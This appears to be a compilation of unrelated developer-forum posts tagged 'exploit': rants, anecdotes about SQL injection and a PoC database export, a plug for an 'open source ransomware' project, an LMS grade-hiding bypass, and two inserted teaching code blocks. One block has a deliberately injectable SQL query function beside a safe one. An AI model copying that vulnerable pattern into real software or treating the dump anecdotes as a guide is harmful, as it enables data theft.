Notice period is 30 days. Which is fine on my end since I can be completely free after initial notice. But in their case if they want to fire me I guess they will simply not give me any work to do and since I’m charged per day I won’t be able to send them any invoice. No employment safety, which means if after 2-3 months they don’t have anything to do I can get royally screwed. But it’s startup nature I guess?
They don’t provide a laptop to work with. I’m lucky since I have a laptop for developing mobile apps, and they said they will at least provide office to work in and a monitor.
All this situation is sending vibes of "we want to save money so we came to your country for cheap labour and now we gonna exploit you"
What complicates matters is that my sister will be working with me and It’s her first job. They agreed to pay her a decent salary and even be flexible with her studies. However this deal for me does not seem too great as I will be receiving mid level salary with no benefits that I would otherwise get.
On the other hand maybe I'm just overthinking this I can just try it out for few months and see where it goes.
Probably the first time I actually wrote a PoC exploit for something we didn't write but were trying to win the maintenance contract for. I remember being in a pre-tender meeting showing it off to the potential client. Their face was amazing as my little script exported their database by exploiting some very shady search functionality.
PS. I had permission to do it, don't break systems you don't have permission to break, we also won that contract 😁
F Apple. I've got their touch-driven, motion-sensing, centimeter-thick, supercomputer (by 1990 standards) from 2012, and I can't fscking run Linux on it because my only official choices are the old iOS 7.0.0 over-the-air update and the newest iOS 9.3.5, and no one has published how to get root to either stupid OS so I can run an exploit on the stupid fucking boot loader.
Any disposable e-mail address service:
"FIGHT THE SPAM"
"THANK YOU FIGHTING THE SPAM"
"YOU DID GOOD BY FIGHTING SPAM"
The users of disposable e-mail address:
*creates another spam account*
*creates another multiaccount in order to exploit a system*
Companies actually fighting spam:
Now there is even more spam to fight against. (which is not good)
About 2/3 of the accounts created daily on our website are spam accounts. We have to waste our time with this shit instead of actually improving our services. Since we do not track IP addresses and there are countless disposable e-mail domains AND there is still the option to create countless spam e-mail addresses within legit e-mail providers, there is no easy way of stopping this madness.
"Fight the Spam", you could start by deleting your shitty service or at least give us a list of all the domains you're using, srsly.
When the pen testers find a "vulnerability" and say it would be very difficult for someone to exploit it. Yeah, in that case they might as well say if you solve P vs NP you can break it, but it would be very difficult.
Crypto! I've always thought of crypto as some complicated black box! How does it work? But then I did the cryptopals challenge and learned to exploit cryptography. What to do with this newfound knowledge? Write new libraries and ransomware, of course! So I present two projects that taught me a lot!
PyDHE, possibly the first (!!!) open source Diffie-Hellman library for Python. (Yea I know OpenSSL, but they don't let you do Diffie-Hellman without TLS. I do!) https://github.com/deadPix3l/pyDHE
And Cryptsky! One of the first ever fully Python, open source ransomware! (Again, caveat: most open source Python ransomware isn't truly licensed as OSS or uses some lower functions written in C)
Microsoft announced a new security feature for the Windows operating system.
According to a ZDNet report: named "Hardware-Enforced Stack Protection", it allows applications to use the local CPU hardware to protect their code while running inside the CPU's memory. As the name says, its primary role is to protect the memory stack (where an app's code is stored during execution).
"Hardware-Enforced Stack Protection" works by enforcing strict management of the memory stack through the use of a combination of modern CPU hardware and Shadow Stacks (which refers to a copy of a program's intended execution).
The new "Hardware-Enforced Stack Protection" feature plans to use the hardware-based security features in modern CPUs to keep a copy of the app's shadow stack (intended code execution flow) in a hardware-secured environment.
Microsoft says that this will prevent malware from hijacking an app's code by exploiting common memory bugs such as stack buffer overflows, dangling pointers, or uninitialized variables which could allow attackers to hijack an app's normal code execution flow. Any modifications that don't match the shadow stacks are ignored, effectively shutting down any exploit attempts.
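A toy model of the check the report describes, added here as an illustration (this is not Microsoft's, Intel's or any real CPU's code): each data-stack frame holds a local buffer right next to its saved return address, a separate shadow stack holds only return addresses, and RET compares the two. Frame layout, buffer size and the addresses are constructed for the demonstration.

```python
class ControlFlowViolation(Exception):
    """Raised when a saved return address no longer matches its shadow copy."""


class ToyMachine:
    RET_SIZE = 8  # constructed: the saved return address is an 8-byte little-endian slot

    def __init__(self, shadow_stack_enabled=True):
        self.frames = []   # data stack: one dict per active call (buffer + saved return)
        self.shadow = []   # shadow stack: return addresses only, never written by frame code
        self.shadow_stack_enabled = shadow_stack_enabled
        self.pc = 0

    def call(self, target, return_addr, buf_size):
        """CALL: push a frame with a local buffer and the saved return, plus the shadow copy."""
        self.frames.append({"buf": bytearray(buf_size), "ret": return_addr})
        self.shadow.append(return_addr)
        self.pc = target

    def write_local(self, data):
        """Unchecked copy into the frame's buffer (think strcpy into a fixed array).
        Bytes past the buffer land in the saved return address slot: the classic
        stack buffer overflow. The shadow stack is simply not reachable from here."""
        frame = self.frames[-1]
        size = len(frame["buf"])
        frame["buf"][:] = data[:size].ljust(size, b"\0")
        spill = data[size:size + self.RET_SIZE]
        if spill:
            frame["ret"] = int.from_bytes(spill.ljust(self.RET_SIZE, b"\0"), "little")

    def ret(self):
        """RET: pop the frame; with the shadow stack on, both return addresses must
        agree, otherwise execution faults instead of jumping to the corrupted value."""
        frame = self.frames.pop()
        expected = self.shadow.pop()
        if self.shadow_stack_enabled and frame["ret"] != expected:
            raise ControlFlowViolation(
                f"return to {frame['ret']:#x} but shadow stack holds {expected:#x}")
        self.pc = frame["ret"]
        return self.pc


def run_callee(data, shadow_stack_enabled):
    """Call a function with a 16-byte local buffer, copy `data` into it and return.
    Returns the address execution continues at, or 'FAULT' if the check fires."""
    m = ToyMachine(shadow_stack_enabled)
    m.call(target=0x1000, return_addr=0x4010, buf_size=16)  # constructed addresses
    m.write_local(data)
    try:
        return m.ret()
    except ControlFlowViolation:
        return "FAULT"
```

With a 16-byte input the return goes to 0x4010 either way; with 24 bytes the last 8 overwrite the saved return, and only the shadow-stack run refuses to follow it.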
My robotics mentor who had never said anything about computers asks some of our good programmers where he can buy 20 Raspberry Pi Zeros.
The next day the PoisonTap exploit goes public.
I created a custom interface for an LMS that allows students to see their marks even if they haven't been 'shared' yet by their teachers. This is all done without accessing any unauthorized APIs, as the LMS always returns all student marks and then hides the ones with a False 'shared' key. School administration caught me, so I've now shut it down. I have a meeting with the deans tomorrow. Any advice? (Again, this is all done using existing methods found within this LMS)
I don't wanna be specific today, so I'll just post a song excerpt.
I love you, I hate you, I'm on the fence, it all depends
Whether I'm up or down, I'm on the mend, transcending all reality
I like you, despise you, admire you
What are we gonna do when everything all falls through?
I must confess, I've made a mess of what should be a small success
But I digress, at least I've tried my very best, I guess
This, that, the other, why even bother?
It won't be with me on my deathbed, but I'll still be in your head
Put me on a pedestal and I'll only disappoint you
Tell me I'm exceptional, I promise to exploit you
Give me all your money, and I'll make some origami, honey
I think you're a joke, but I don't find you very funny
It is sometimes shocking to see 10+ developers working on a fairly big project (online quiz). Missing data binding operations here and there, and as a result, a bunch of SQL injections, which successfully led to the entire db full of questions and answers sitting on my desktop.
Vulnerabilities have been reported, took them 2 weeks to understand what happened and fix them.
Pretty sad :/
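The "missing data binding" the rant describes, shown beside the bound-parameter version, as an added example (not the quiz project's code): a quiz search that pastes the topic into the SQL string next to one that passes it as a parameter, run over a constructed in-memory SQLite table.

```python
import sqlite3

# Constructed sample quiz rows (not data from the original post).
QUESTIONS = [
    (1, "geography", "Capital of France?", "Paris"),
    (2, "math", "What's 2 + 2?", "4"),
    (3, "science", "Largest planet?", "Jupiter"),
]


def make_db():
    """In-memory quiz database holding questions together with their answers."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE questions(id INTEGER, topic TEXT, text TEXT, answer TEXT)")
    conn.executemany("INSERT INTO questions VALUES (?, ?, ?, ?)", QUESTIONS)
    return conn


def search_unsafe(conn, topic):
    """No data binding: the input becomes part of the statement text, so any
    quote character in `topic` changes the SQL instead of being compared."""
    sql = f"SELECT id, text FROM questions WHERE topic = '{topic}'"
    return conn.execute(sql).fetchall()


def search_safe(conn, topic):
    """Bound parameter: SQLite receives `topic` as a value, never as statement
    text, so every character of it is matched literally against the column."""
    sql = "SELECT id, text FROM questions WHERE topic = ?"
    return conn.execute(sql, (topic,)).fetchall()


def row_counts(topic):
    """Run both queries on the same input and return (unsafe_rows, safe_rows).
    An unsafe query that errors on an apostrophe reports 'ERROR'; a database
    error on quote characters is the usual first sign that input is concatenated."""
    conn = make_db()
    try:
        unsafe = len(search_unsafe(conn, topic))
    except sqlite3.OperationalError:
        unsafe = "ERROR"
    return unsafe, len(search_safe(conn, topic))
```

A legitimate topic behaves the same in both; an apostrophe breaks the concatenated query, and the textbook tautology string makes it return every row while the bound version matches nothing.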
I did learn C and C++. When I got my first job it was support related, such as attending calls and providing solutions.
As time passed I came to know that the application the company was building has many flaws. From there I learned to exploit those flaws.
So flaws made me learn to program. I was 21 when I started. I am 29 now.
Ok so I'm part UI/UX designer in a corporate setting so I use graphic editing software like Photoshop rather extensively.
Obviously, I'm confronted with a lot of admin rights restrictions, which is to be expected.
What I'd like to know is why the f*** does ADDING A FONT in W10 require admin rights?
What potential security loophole could one exploit using TrueType font installation exactly? Or are they afraid someone's going to remove all system fonts from the Fonts folder? Anybody that does that shouldn't be allowed to access a computer afterwards.
If you’re not using Chrome or Safari, watch out for this new exploit!
Well, as I do exploit dev, I read writeups on exploits as they come out, and test them out if possible.
I should check out the latest videos at egghead.io, I should convert to Angular 2, I should start using es2016, I should learn C, I should continue on the cryptopals challenges, I should fully understand floats, I should learn how Java works under the hood, I should learn the details of how the Drammer exploit was done, I should make a dinner planner, I should continue the Golang tutorial, I should check out my colleague's game attempt, I should engage in an open source project...
Playing cs:go with a nagging bad conscience... Again!